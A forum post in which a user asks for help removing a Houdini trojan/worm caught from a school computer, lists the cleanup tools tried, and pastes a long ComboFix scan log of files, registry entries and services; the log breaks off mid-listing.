
Houdini Trojan/Worm

I have a Houdini trojan/worm on my computer; I got it from my school's public computers (yes I know, I'm stupid for sticking a USB into a public school computer :v). I have successfully got it off my USB and stopped most of its functions, like blocking my access to regedit and msconfig and transferring the trojan to my USB, but only by disabling Windows Script Host (or something along those lines).
It uses wscript; that I know because on the USB the cmd file executed wscript. But I'm not sure if it's safe to just delete wscript altogether, since it is a Windows pre-installed file and the virus is only just using it.

I've deleted some files using a variety of programs like RogueKiller, SMADAV, Malwarebytes, ComboFix (I'll post the ComboFix log in a sec) and a bunch more. Avast did absolutely nothing, so I'm thinking about swapping Avast for AVG (though I don't know if I should, or whether to just wait for Avast to take things from AVG since Avast bought AVG), but I'm sure that there are still files and traces of Houdini left, and I'm afraid that the worm will make it multiply. Thanks

ComboFix log:
ComboFix 16-11-06.01 - Usuario 11/11/2016 20:11:18.1.2 - x64
Microsoft Windows 7 Home Basic 6.1.7601.1.1252.1.3082.18.3580.1745 [GMT -6:00]
Running from: c:\users\Usuario\Downloads\ComboFix.exe
AV: Avast Antivirus *Disabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Avast Antivirus *Disabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Usuario\AppData\Local\DeSmuME
c:\users\Usuario\AppData\Local\DeSmuME\Battery\4780 - Pokemon HeartGold (U)(Xenophobia).dsv
c:\users\Usuario\AppData\Local\DeSmuME\desmume.ini
c:\users\Usuario\AppData\Local\DeSmuME\States\4780 - Pokemon HeartGold (U)(Xenophobia).ds0
c:\users\Usuario\AppData\Roaming\Microsoft\Windows\Recent\Team Fortress 2.url
c:\windows\SysWow64\1
c:\windows\SysWow64\2
c:\windows\SysWow64\3
c:\windows\SysWow64\DEBUG.log
.
.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Service_AdobeUpdateService
.
.
((((((((((((((((((((((((( Files Created from 2016-10-12 to 2016-11-12 )))))))))))))))))))))))))))))))
.
.
2016-11-12 02:40 . 2016-11-12 02:40 -------- d-----w- c:\users\Default\AppData\Local\temp
2016-11-11 21:24 . 2016-11-11 21:24 28272 ----a-w- c:\windows\system32\drivers\TrueSight.sys
2016-11-11 04:36 . 2016-11-12 02:50 192216 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2016-11-11 04:31 . 2016-11-11 04:31 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
2016-11-11 04:31 . 2016-11-11 04:31 -------- d-----w- c:\programdata\Malwarebytes
2016-11-11 04:31 . 2016-03-10 20:09 64896 ----a-w- c:\windows\system32\drivers\mwac.sys
2016-11-11 04:31 . 2016-03-10 20:08 140672 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2016-11-11 04:31 . 2016-03-10 20:08 27008 ----a-w- c:\windows\system32\drivers\mbam.sys
2016-11-11 00:44 . 2016-11-11 15:24 -------- d-----w- c:\users\Usuario\AppData\Roaming\Enigma Software Group
2016-11-11 00:43 . 2016-11-11 00:43 -------- d-----w- C:\sh4ldr
2016-11-11 00:42 . 2016-11-11 15:24 -------- d-----w- c:\program files\Enigma Software Group
2016-11-10 22:01 . 2016-11-10 22:01 -------- d-----w- c:\program files (x86)\Common Files\SpeedyPC Software
2016-11-10 22:01 . 2016-11-10 22:01 -------- d-----w- c:\program files\BDServices
2016-11-10 21:57 . 2016-11-10 22:22 -------- d-----w- C:\[Smad-Cage]
2016-11-10 06:10 . 2016-11-10 06:10 -------- d-----w-Smad-Lock (Brankas Smadav) ? C:\SMAD-L~1
2016-11-10 05:44 . 2016-11-10 05:44 44952 ----a-w- c:\windows\system32\drivers\staport.sys
2016-11-10 05:43 . 2016-11-10 01:31 391496 ----a-w- c:\windows\system32\aswBoot.exe
2016-11-10 01:30 . 2016-11-10 01:30 53208 ----a-w- c:\windows\avastSS.scr
2016-11-09 06:15 . 2016-11-09 06:15 -------- d-----w- c:\users\Usuario\AppData\Roaming\Smadav
2016-11-09 06:15 . 2016-11-10 06:04 -------- d-----w- c:\program files (x86)\SMADAV
2016-11-09 06:03 . 2016-11-09 06:06 -------- d-----w- c:\program files\RogueKiller
2016-11-09 06:03 . 2016-11-12 01:57 -------- d-----w- c:\programdata\RogueKiller
2016-11-09 04:35 . 2016-11-09 04:35 -------- d-----w- c:\program files\7-Zip
2016-10-31 06:21 . 2016-11-10 01:24 -------- d--h--w- c:\users\Usuario\AppData\Roaming\jieio
2016-10-17 17:22 . 2016-10-17 17:22 -------- d-----w- c:\program files (x86)\Common Files\Skype
2016-10-16 05:49 . 2016-11-11 16:52 -------- d-----w- c:\users\Usuario\AppData\Local\Deployment
2016-10-16 05:49 . 2016-10-16 05:49 -------- d-----w- c:\users\Usuario\AppData\Local\Apps
2016-10-16 05:28 . 2016-10-16 05:28 -------- d-----w- c:\users\Usuario\AppData\Roaming\InstallShield
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2016-11-10 01:32 . 2014-11-13 17:51 293352 ----a-w- c:\windows\system32\drivers\aswVmm.sys
2016-11-10 01:32 . 2014-11-13 17:51 513632 ----a-w- c:\windows\system32\drivers\aswSP.sys
2016-11-10 01:32 . 2014-11-13 17:51 969184 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2016-11-10 01:31 . 2014-11-13 17:51 163416 ----a-w- c:\windows\system32\drivers\aswStm.sys
2016-11-10 01:31 . 2014-11-13 17:51 74544 ----a-w- c:\windows\system32\drivers\aswRvrt.sys
2016-11-10 01:31 . 2014-11-13 17:51 37656 ----a-w- c:\windows\system32\drivers\aswHwid.sys
2016-11-10 01:31 . 2014-11-13 17:51 108816 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys
2016-11-10 01:31 . 2014-11-13 17:51 103064 ----a-w- c:\windows\system32\drivers\aswRdr2.sys
2016-11-10 01:30 . 2016-06-14 15:27 37144 ----a-w- c:\windows\system32\drivers\aswKbd.sys
2016-11-07 00:27 . 2015-03-11 03:33 796352 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2016-11-07 00:27 . 2015-03-11 03:33 142528 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2016-10-14 10:56 . 2016-10-14 10:56 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.4736.dll
2016-10-13 07:14 . 2016-10-13 07:14 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.4028.dll
2016-10-01 08:19 . 2016-10-01 08:19 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.1268.dll
2016-09-25 09:12 . 2016-09-25 09:12 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.3064.dll
2016-09-07 07:10 . 2016-09-07 07:10 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.3124.dll
2016-09-06 10:31 . 2016-09-06 10:31 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.172.dll
2016-08-30 09:58 . 2016-08-30 09:58 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.4436.dll
2016-08-29 17:04 . 2016-08-29 17:04 485512 ----a-w- c:\windows\system32\drivers\Trufos.sys
2016-08-27 07:41 . 2016-08-27 07:41 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.3188.dll
2016-08-24 09:37 . 2016-08-24 09:37 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.5448.dll
2016-08-17 08:40 . 2016-08-17 08:40 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.5620.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive1]
@="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
[HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
2015-05-31 04:24 223432 ----a-w- c:\users\Usuario\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive2]
@="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
[HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
2015-05-31 04:24 223432 ----a-w- c:\users\Usuario\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive3]
@="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
[HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
2015-05-31 04:24 223432 ----a-w- c:\users\Usuario\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\###MegaShellExtPending]
@="{056D528D-CE28-4194-9BA3-BA2E9197FF8C}"
[HKEY_CLASSES_ROOT\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C}]
2014-05-01 14:15 463360 ----a-w- c:\users\Usuario\AppData\Local\MEGAsync\ShellExtX32.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\###MegaShellExtSynced]
@="{05B38830-F4E9-4329-978B-1DD28605D202}"
[HKEY_CLASSES_ROOT\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202}]
2014-05-01 14:15 463360 ----a-w- c:\users\Usuario\AppData\Local\MEGAsync\ShellExtX32.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\###MegaShellExtSyncing]
@="{0596C850-7BDD-4C9D-AFDF-873BE6890637}"
[HKEY_CLASSES_ROOT\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637}]
2014-05-01 14:15 463360 ----a-w- c:\users\Usuario\AppData\Local\MEGAsync\ShellExtX32.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Steam"="c:\program files (x86)\Steam\steam.exe" [2016-10-13 2860832]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"SM?RT-Protection"="c:\program files (x86)\Smadav\SM?RTP.exe" [?]
"AvastUI.exe"="c:\program files\AVAST Software\Avast\AvastUI.exe" [2016-11-10 9044392]
"RazerCortex"="c:\program files (x86)\Razer\Razer Cortex\RazerCortex.exe" [2015-06-05 98256]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
"SoftwareSASGeneration"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"aux"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Notification Packages REG_MULTI_SZ scecli c:\program files\TrueKey\McAfeeTrueKeyPasswordFilter
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-]
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe"
"BlueStacks Agent"=c:\program files (x86)\BlueStacks\HD-Agent.exe
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
.
R0 ddkmdldr;ddkmdldr;c:\windows\system32\drivers\ddkmdldr.sys;c:\windows\SYSNATIVE\drivers\ddkmdldr.sys [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 ddmgr;ddmgr;c:\windows\system32\ddmgr.exe;c:\windows\SYSNATIVE\ddmgr.exe [x]
R2 InstallerService;Service Installer TrueKey;c:\program files\TrueKey\Mcafee.TrueKey.InstallerService.exe;c:\program files\TrueKey\Mcafee.TrueKey.InstallerService.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 AFTrafMgr1.1;AFTrafMgr1.1;c:\program files (x86)\Hotspot Shield\bin\TrafMgr_1_1_64.sys;c:\program files (x86)\Hotspot Shield\bin\TrafMgr_1_1_64.sys [x]
R3 amdiox64;AMD IO Driver;c:\windows\system32\DRIVERS\amdiox64.sys;c:\windows\SYSNATIVE\DRIVERS\amdiox64.sys [x]
R3 aswHwid;avast! HardwareID;c:\windows\system32\drivers\aswHwid.sys;c:\windows\SYSNATIVE\drivers\aswHwid.sys [x]
R3 BstHdAndroidSvc;BlueStacks Android Service;c:\program files (x86)\BlueStacks\HD-Service.exe BstHdAndroidSvc Android;c:\program files (x86)\BlueStacks\HD-Service.exe BstHdAndroidSvc Android [x]
R3 BstHdLogRotatorSvc;BlueStacks Log Rotator Service;c:\program files (x86)\BlueStacks\HD-LogRotatorService.exe;c:\program files (x86)\BlueStacks\HD-LogRotatorService.exe [x]
R3 BstHdUpdaterSvc;BlueStacks Updater Service;c:\program files (x86)\BlueStacks\HD-UpdaterService.exe;c:\program files (x86)\BlueStacks\HD-UpdaterService.exe [x]
R3 cpuz134;cpuz134;c:\users\Usuario\AppData\Local\Temp\cpuz134\cpuz134_x64.sys;c:\users\Usuario\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [x]
R3 DxkgFilter;Filtering Dxkg;c:\program files (x86)\iDisplay\idisplay.sys;c:\program files (x86)\iDisplay\idisplay.sys [x]
R3 EagleX64;EagleX64;c:\windows\system32\drivers\EagleX64.sys;c:\windows\SYSNATIVE\drivers\EagleX64.sys [x]
R3 EasyAntiCheat;EasyAntiCheat;c:\windows\system32\EasyAntiCheat.exe;c:\windows\SYSNATIVE\EasyAntiCheat.exe [x]
R3 EvolveVirtualAdapter;Evolve Virtual Miniport Driver;c:\windows\system32\DRIVERS\evolve.sys;c:\windows\SYSNATIVE\DRIVERS\evolve.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\McAfee Security Scan\3.11.266\McCHSvc.exe;c:\program files\McAfee Security Scan\3.11.266\McCHSvc.exe [x]
R3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 VSStandardCollectorService140;Visual Studio Standard Collector Service;c:\program files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe;c:\program files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [x]
R3 wsvd;wsvd;c:\windows\system32\DRIVERS\wsvd.sys;c:\windows\SYSNATIVE\DRIVERS\wsvd.sys [x]
R3 X6va029;X6va029;c:\windows\SysWOW64\Drivers\X6va029;c:\windows\SysWOW64\Drivers\X6va029 [x]
R4 AGSService;Adobe Genuine Software Integrity Service;c:\program files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe;c:\program files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [x]
R4 ddkmd;ddkmd;c:\windows\system32\drivers\ddkmd.sys;c:\windows\SYSNATIVE\drivers\ddkmd.sys [x]
R4 hshld;Hotspot Shield Service;c:\program files (x86)\Hotspot Shield\bin\cmw_srv.exe;c:\program files (x86)\Hotspot Shield\bin\cmw_srv.exe [x]
R4 MF NTFS Monitor;MediaFire NTFS Monitor;c:\users\Usuario\AppData\Local\MEDIAF~1\MFUSNM~1.EXE;c:\users\Usuario\AppData\Local\MEDIAF~1\MFUSNM~1.EXE [x]
R4 RadeonPro Support Service;RadeonPro Support Service;c:\program files (x86)\RadeonPro\RadeonProSupport.exe;c:\program files (x86)\RadeonPro\RadeonProSupport.exe [x]
R4 SSUService;Splashtop Software Updater Service;c:\program files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe;c:\program files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe [x]
R4 TrueKey;Intel Security True Key;c:\program files\TrueKey\McAfee.TrueKey.Service.exe;c:\program files\TrueKey\McAfee.TrueKey.Service.exe [x]
R4 TrueKeyScheduler;Intel Security True Key Scheduler;c:\program files\TrueKey\McTkSchedulerService.exe;c:\program files\TrueKey\McTkSchedulerService.exe [x]
R4 TrueKeyServiceHelper;TrueKeyServiceHelper;c:\program files\TrueKey\McAfee.TrueKey.ServiceHelper.exe;c:\program files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [x]
R4 TuneUp.UtilitiesSvc;AVG PC TuneUp Service;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [x]
S0 aswRvrt;avast! Revert; [x]
S0 aswVmm;avast! VM Monitor; [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S0 WinI2C-DDC;WinI2C-DDC Kernel Mode Driver;c:\windows\system32\drivers\DDCDrv.sys;c:\windows\SYSNATIVE\drivers\DDCDrv.sys [x]
S1 aswKbd;aswKbd;c:\windows\system32\drivers\aswKbd.sys;c:\windows\SYSNATIVE\drivers\aswKbd.sys [x]
S1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys;c:\windows\SYSNATIVE\drivers\aswSnx.sys [x]
S1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys;c:\windows\SYSNATIVE\drivers\aswSP.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 AMD FUEL Service;AMD FUEL Service;c:\program files\AMD\ATI.ACE\Fuel\Fuel.Service.exe;c:\program files\AMD\ATI.ACE\Fuel\Fuel.Service.exe [x]
S2 Apple Mobile Device Service;Apple Mobile Device Service;c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe;c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [x]
S2 APXACC;AppEx Networks Accelerator LWF;c:\windows\system32\DRIVERS\appexDrv.sys;c:\windows\SYSNATIVE\DRIVERS\appexDrv.sys [x]
S2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys;c:\windows\SYSNATIVE\drivers\aswMonFlt.sys [x]
S2 aswStm;aswStm;c:\windows\system32\drivers\aswStm.sys;c:\windows\SYSNATIVE\drivers\aswStm.sys [x]
S2 BitDefenderCOM;BitDefenderCOM;c:\program files\BDServices\BitDefenderCom.exe;c:\program files\BDServices\BitDefenderCom.exe [x]
S2 BstHdDrv;BlueStacks Hypervisor;c:\program files (x86)\BlueStacks\HD-Hypervisor-amd64.sys;c:\program files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [x]
S2 DiagTrack;Diagnostics Tracking Service;c:\windows\System32\svchost.exe;c:\windows\SYSNATIVE\svchost.exe [x]
S2 IconMan_R;IconMan_R;c:\program files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe;c:\program files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [x]
S2 JME Keyboard;JME Keyboard Driver;c:\windows\jmesoft\Service.exe;c:\windows\jmesoft\Service.exe [x]
S2 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [x]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [x]
S2 mfmonitor;mfmonitor;c:\windows\system32\DRIVERS\mfmonitor_x64.sys;c:\windows\SYSNATIVE\DRIVERS\mfmonitor_x64.sys [x]
S2 Razer Game Scanner Service;Razer Game Scanner;c:\program files (x86)\Razer\Razer Services\GSS\GameScannerService.exe;c:\program files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [x]
S2 RzKLService;RzKLService;c:\program files (x86)\Razer\Razer Cortex\RzKLService.exe;c:\program files (x86)\Razer\Razer Cortex\RzKLService.exe [x]
S2 rzpmgrk;rzpmgrk;c:\windows\system32\drivers\rzpmgrk.sys;c:\windows\SYSNATIVE\drivers\rzpmgrk.sys [x]
S3 AtiHDAudioService;AMD Function Driver for HD Audio Service;c:\windows\system32\drivers\AtihdW76.sys;c:\windows\SYSNATIVE\drivers\AtihdW76.sys [x]
S3 clwvd;CyberLink WebCam Virtual Driver;c:\windows\system32\DRIVERS\clwvd.sys;c:\windows\SYSNATIVE\DRIVERS\clwvd.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys;c:\windows\SYSNATIVE\drivers\MBAMSwissArmy.sys [x]
S3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]
S3 RSPCIESTOR;Realtek PCIE CardReader Driver;c:\windows\system32\DRIVERS\RtsPStor.sys;c:\windows\SYSNATIVE\DRIVERS\RtsPStor.sys [x]
S3 RTL8192Ce;Realtek Wireless LAN 802.11n PCI-E NIC Driver;c:\windows\system32\DRIVERS\rtl8192Ce.sys;c:\windows\SYSNATIVE\DRIVERS\rtl8192Ce.sys [x]
S3 taphss6;Anchorfree HSS VPN Adapter;c:\windows\system32\DRIVERS\taphss6.sys;c:\windows\SYSNATIVE\DRIVERS\taphss6.sys [x]
S3 usbfilter;AMD USB Filter Driver;c:\windows\system32\DRIVERS\usbfilter.sys;c:\windows\SYSNATIVE\DRIVERS\usbfilter.sys [x]
S3 VMC412;Vimicro Camera Service VMC412;c:\windows\system32\Drivers\VMC412.sys;c:\windows\SYSNATIVE\Drivers\VMC412.sys [x]
S3 vwhid;Virtual Wireless HID;c:\windows\system32\DRIVERS\vwhid.sys;c:\windows\SYSNATIVE\DRIVERS\vwhid.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - MBAMSWISSARMY
*NewlyCreated* - WS2IFSL
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2016-11-03 01:54 1363560 ----a-w- c:\program files (x86)\Google\Chrome\Application\54.0.2840.87\Installer\chrmstp.exe
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{A6EADE66-0000-0000-484E-7E8A45000000}]
2016-06-30 11:55 322232 ----a-w- c:\program files (x86)\Adobe\Acrobat Reader DC\Esl\AiodLite.dll
.
Contents of the 'Scheduled Tasks' folder
.
2016-11-12 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-03-11 00:27]
.
2016-11-12 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-04-27 12:09]
.
2016-11-12 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-04-27 12:09]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ AccExtIco1]
@="{AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47}"
[HKEY_CLASSES_ROOT\CLSID\{AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47}]
2015-11-14 10:23 553120 ------w- c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ AccExtIco2]
@="{853B7E05-C47D-4985-909A-D0DC5C6D7303}"
[HKEY_CLASSES_ROOT\CLSID\{853B7E05-C47D-4985-909A-D0DC5C6D7303}]
2015-11-14 10:23 553120 ------w- c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ AccExtIco3]
@="{42D38F2E-98E9-4382-B546-E24E4D6D04BB}"
[HKEY_CLASSES_ROOT\CLSID\{42D38F2E-98E9-4382-B546-E24E4D6D04BB}]
2015-11-14 10:23 553120 ------w- c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive1]
@="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
[HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
2015-05-31 04:24 262344 ----a-w- c:\users\Usuario\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive2]
@="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
[HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
2015-05-31 04:24 262344 ----a-w- c:\users\Usuario\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive3]
@="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
[HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
2015-05-31 04:24 262344 ----a-w- c:\users\Usuario\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\###MegaShellExtPending]
@="{056D528D-CE28-4194-9BA3-BA2E9197FF8C}"
[HKEY_CLASSES_ROOT\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C}]
2014-05-01 14:13 470016 ----a-w- c:\users\Usuario\AppData\Local\MEGAsync\ShellExtX64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\###MegaShellExtSynced]
@="{05B38830-F4E9-4329-978B-1DD28605D202}"
[HKEY_CLASSES_ROOT\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202}]
2014-05-01 14:13 470016 ----a-w- c:\users\Usuario\AppData\Local\MEGAsync\ShellExtX64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\###MegaShellExtSyncing]
@="{0596C850-7BDD-4C9D-AFDF-873BE6890637}"
[HKEY_CLASSES_ROOT\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637}]
